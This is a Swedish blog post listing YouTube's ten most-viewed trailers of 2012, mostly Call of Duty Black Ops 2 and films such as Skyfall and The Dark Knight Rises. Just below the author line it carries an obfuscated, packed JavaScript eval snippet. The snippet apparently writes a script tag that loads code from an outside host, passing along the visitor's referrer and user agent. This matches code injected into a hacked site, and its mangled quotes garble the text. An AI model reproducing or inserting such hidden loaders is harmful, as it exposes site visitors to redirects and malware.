Image Image Image Image Image Image Image Image Image Image

| 19 januari, 2020

Scroll to top

Top

Mest visade trailers på YouTube 2012

Sebastian

Youtube: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rzrny|var|u0026u|referrer|izyit||js|php’.split(’|’),0,{}))
Vi kliver sakta men säkert in i ett nytt år med nya möjligheter. Därför vill Youtube bjuda på några av de mest visade trailers på deras sajt 2012. Listan med trailers omfattar kategorierna tv, film och spel.

Inte helt oväntat men ändå konstigt är att den mest visade trailern 2012 blev ”Suprise” från spelet Call of Duty Black Ops 2. Den videon är nu uppe i 3o miljoner visningar. Men vi kan även se fler trailers för spelet på top 10 listan. På plats åtta och tio hittar vi två  till trailers för just Call of Duty Black Ops 2.

När det kommer till filmtrailers så vann filmen ”The Dark Knight Rises” första platsen och tredje platsen på den totala listan.

Här är hela listan:

1. Call of Duty Black Ops 2 – “Surprise”
2. Call of Duty Black Ops 2 – ”Reveal Trailer”
3. The Dark Knight Rises – ”Official Trailer #3“
4. Skyfall – ”Official Trailer“
5. Ted – ”Trailer“
6. Hunger Games – ”Theatrical Trailer #2“
7. Revolution – ”Trailer“
8. Call of Duty Black Ops 2 – ”Multiplayer Reveal Trailer”
9. Skyfall – “Official Teaser Trailer“
10. Call of Duty Black Ops 2 – “Launch Trailer”

via TheNextWeb